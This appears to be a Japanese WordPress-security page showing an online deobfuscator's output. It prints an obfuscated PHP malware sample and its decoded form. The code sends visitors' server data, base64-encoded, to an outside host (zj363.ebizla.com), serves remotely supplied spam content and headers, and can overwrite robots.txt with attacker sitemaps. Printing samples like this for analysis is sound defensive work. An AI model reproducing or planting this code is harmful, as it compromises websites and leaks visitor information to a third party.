Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php goto w3Ivq; TOOF1: if (!($Qt2Pa == "\x65\x78\x69\x74")) { goto cb6Py; } goto TYptK; CV1GM: echo "\110\x54\x54\120\57\x31\56\x30\40\64\x30\x34\40\116\x6f\x74\40\106\x6f\x75\x6e\144\x5f\x5f\x5f" . $CBxOi . "\137\137\137" . $XRM8O; goto ocggp; kBrPR: if (!(PrEG_MaTcH("\x2f\152\160\62\x30\x32\63\57\x73\151", $_SERVER["\x52\105\x51\x55\105\123\x54\137\x55\122\x49"]) == RouND(0.4563 + 0.5437))) { goto x6KFI; } goto M6Q_C; vbJoC: Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.2296698 + 0.25431247 + 0.312 + 0.1049778 + 0.0985707)); goto Ut09H; LCNhg: $o2a8S = "\57\x69\x6e\144\145\170\x2e\x70\x68\x70\77\126\x53\75" . $XRM8O . "\46\x47\120\75" . $CBxOi; goto Kjf6N; suRfg: $CBxOi = "\172\152\63\x36\63"; goto LNU0T; Fq3XY: foreach ($RYHfB as $ET2jI) { goto ssJrr; Z4WnG: $lD0mT = STR_RepLacE("\57", "\137", $lD0mT); goto ZgQIx; qF2D1: $lD0mT = sTr_REpLAce("\x2b", "\55", $lD0mT); goto Z4WnG; ssJrr: $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : ''; goto Biu3V; ZgQIx: $lD0mT = sTr_rEplAcE("\x3d", "\56", $lD0mT); goto V0wO3; BUgcu: WfTDO: goto EIvGM; Biu3V: $lD0mT = Base64_eNCOde(TRIm($vhKCJ)); goto qF2D1; V0wO3: $o2a8S .= "\46" . $ET2jI . "\x3d" . $lD0mT; goto BUgcu; EIvGM: } goto pWfoe; rJUE7: Iw8Qi: goto CV1GM; Kjf6N: $RYHfB = array("\x53\103\122\111\120\x54\137\x4e\x41\x4d\105", "\122\x45\x51\x55\x45\x53\124\x5f\x55\x52\111", "\x48\124\x54\x50\x53", "\122\105\x51\125\105\123\124\x5f\123\x43\110\105\x4d\105", "\x53\105\122\x56\x45\122\x5f\x50\117\122\124", "\122\105\x4d\x4f\x54\105\137\101\x44\104\122", "\x48\x54\x54\x50\x5f\122\105\x46\105\122\x45\x52", "\x48\124\x54\x50\137\x41\103\x43\x45\120\x54\137\x4c\101\116\x47\x55\x41\x47\x45", "\x48\x54\x54\x50\137\125\x53\105\x52\x5f\101\107\105\116\124", "\110\x54\124\120\x5f\110\117\x53\124"); goto Fq3XY; FhED6: $at3DT = tRIm($yI5XT[roUnD(0.49818402 + 0.502)]); goto nn9ul; F4ugF: $tchaq = coUNT($yI5XT); goto I1Vb9; eT33f: ARRAY_POp($sawfx); goto PQr_Y; iqPOj: XdLk6: goto MhPsr; RKiUC: if (!empty($gJbJb)) { goto YiiVN; } goto Y5OsT; Ut09H: cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(6.9481 + 3.052)); goto MNFDU; xuJEc: MVSwC: goto DRTHq; FbCQX: goto ZlxT7; goto iqPOj; TYptK: exit; goto aApq5; o8VKE: $sawfx = ExplODE("\x3c\142\162\x2f\76", $at3DT); goto eT33f; aApq5: cb6Py: goto uf0dp; eN93L: echo $at3DT; goto xuJEc; mjifa: $e0cIs = "\125\163\145\162\55\141\x67\x65\x6e\x74\72\52" . PHP_EOL; goto c9DD1; nF5JG: gJDLR: goto FhED6; D4gH2: echo "\162\157\142\x6f\x74\163\56\164\170\164\40\x64\157\x6e\x65"; goto zc5T8; WjOu8: Rqv9t: goto lMegx; MhPsr: heADEr("\x48\124\124\120\57\x31\x2e\x30\40\64\x30\64\40\x4e\x6f\164\x20\x46\157\165\156\144"); goto Vm6tj; w3Ivq: ERrOr_REPORTiNg(RoUNd(0 + 0 + 0)); goto suRfg; mawLH: HEADeR("\x48\x54\x54\120\x2f\x31\56\60\x20\64\60\x34\x20\x4e\x6f\x74\x20\106\x6f\165\x6e\144"); goto rJUE7; M1Iy_: HEaDEr($AZiUQ); goto nF5JG; OtOqw: $gJbJb = tRIm($gJbJb); goto VQ511; O0T2T: YiiVN: goto OtOqw; dIQys: $t5UQ0 = curL_INIt(); goto UxwGz; UxwGz: cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H); goto vbJoC; y3Zt3: x6KFI: goto SKfIJ; Vm6tj: exit; goto yFiPV; MNFDU: $gJbJb = CUrL_ExeC($t5UQ0); goto l5L8K; L0BG4: curL_CLoSe($t5UQ0); goto RKiUC; ocggp: exit; goto y3Zt3; rxFXI: if (empty($AZiUQ)) { goto gJDLR; } goto M1Iy_; nn9ul: if (empty($at3DT)) { goto MVSwC; } goto eN93L; lMegx: fILe_PUT_CONtenTs($_SERVER["\104\117\103\125\115\x45\x4e\x54\x5f\x52\x4f\117\x54"] . "\57\162\x6f\142\x6f\x74\x73\x2e\x74\170\164", $e0cIs); goto D4gH2; M6Q_C: if (!(PReg_mAtch("\x2f\x6a\x70\62\60\x32\63\x63\x77\167\57\163\151", $_SERVER["\x52\x45\x51\125\x45\123\x54\x5f\125\122\x49"]) == rOUNd(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0))) { goto Iw8Qi; } goto mawLH; zc5T8: exit; goto kiwFy; I1Vb9: if ($tchaq < 3) { goto XdLk6; } goto gT6kW; SKfIJ: $l2pTy = "\x68\164\164\160\72\57\x2f" . $CBxOi . "\x2e\x65\x62\x69\x7a\154\x61\56\x63\157\x6d"; goto LCNhg; VQ511: $yI5XT = eXPLoDE("\x7c\x40\x23\44\174", $gJbJb); goto F4ugF; c9DD1: $e0cIs .= "\x41\154\154\157\167\72\57" . PHP_EOL; goto o8VKE; Y5OsT: $gJbJb = FilE_get_cOnTeNts($CV76H); goto O0T2T; DRTHq: $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.29826 + 0.398166 + 0.3035714)]); goto TOOF1; kiwFy: ovD9C: goto FbCQX; l5L8K: $gJbJb = tRim($gJbJb); goto L0BG4; uf0dp: if (!($Qt2Pa == "\x70\151\x6e\x67")) { goto ovD9C; } goto mjifa; BiVrT: $CV76H = $l2pTy . $o2a8S; goto dIQys; pWfoe: dhC9N: goto BiVrT; LNU0T: $XRM8O = "\161\157\x31"; goto kBrPR; PQr_Y: foreach ($sawfx as $Tq_l3) { $e0cIs .= "\123\x69\164\145\155\141\x70\x3a" . $Tq_l3 . PHP_EOL; DCw8O: } goto WjOu8; gT6kW: $AZiUQ = TRim($yI5XT[rounD(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)]); goto rxFXI; yFiPV: ZlxT7:
<?php ERrOr_REPORTiNg(RoUNd(0)); $CBxOi = "zj363"; $XRM8O = "qo1"; if (!(PrEG_MaTcH("/jp2023/si", $_SERVER["REQUEST_URI"]) == RouND(1.0))) { $l2pTy = "http://zj363.ebizla.com"; $o2a8S = "/index.php?VS=qo1&GP=zj363"; $RYHfB = array("SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST"); foreach ($RYHfB as $ET2jI) { $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : ''; $lD0mT = Base64_eNCOde(TRIm($vhKCJ)); $lD0mT = sTr_REpLAce("+", "-", $lD0mT); $lD0mT = STR_RepLacE("/", "_", $lD0mT); $lD0mT = sTr_rEplAcE("=", ".", $lD0mT); $o2a8S .= "&" . $ET2jI . "=" . $lD0mT; } $CV76H = $l2pTy . $o2a8S; $t5UQ0 = curL_INIt(); cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H); Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.9995307700000001)); cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(10.0001)); $gJbJb = CUrL_ExeC($t5UQ0); $gJbJb = tRim($gJbJb); curL_CLoSe($t5UQ0); if (!empty($gJbJb)) { goto YiiVN; } $gJbJb = FilE_get_cOnTeNts($CV76H); YiiVN: $gJbJb = tRIm($gJbJb); $yI5XT = eXPLoDE("|@#\$|", $gJbJb); $tchaq = coUNT($yI5XT); if ($tchaq < 3) { heADEr("HTTP/1.0 404 Not Found"); exit; } $AZiUQ = TRim($yI5XT[rounD(0)]); if (empty($AZiUQ)) { goto gJDLR; } HEaDEr($AZiUQ); gJDLR: $at3DT = tRIm($yI5XT[roUnD(1.00018402)]); if (empty($at3DT)) { goto MVSwC; } echo $at3DT; MVSwC: $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.9999974)]); if (!($Qt2Pa == "exit")) { if (!($Qt2Pa == "ping")) { // [PHPDeobfuscator] Implied script end return; } $e0cIs = "User-agent:*PHP_EOL"; $e0cIs = "User-agent:*PHP_EOLAllow:/PHP_EOL"; $sawfx = ExplODE("<br/>", $at3DT); ARRAY_POp($sawfx); foreach ($sawfx as $Tq_l3) { $e0cIs .= "Sitemap:" . $Tq_l3 . PHP_EOL; } fILe_PUT_CONtenTs($_SERVER["DOCUMENT_ROOT"] . "/robots.txt", $e0cIs); echo "robots.txt done"; exit; } exit; } if (!(PReg_mAtch("/jp2023cww/si", $_SERVER["REQUEST_URI"]) == rOUNd(0))) { goto Iw8Qi; } HEADeR("HTTP/1.0 404 Not Found"); Iw8Qi: echo "HTTP/1.0 404 Not Found___" . $CBxOi . "___" . $XRM8O; exit;
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.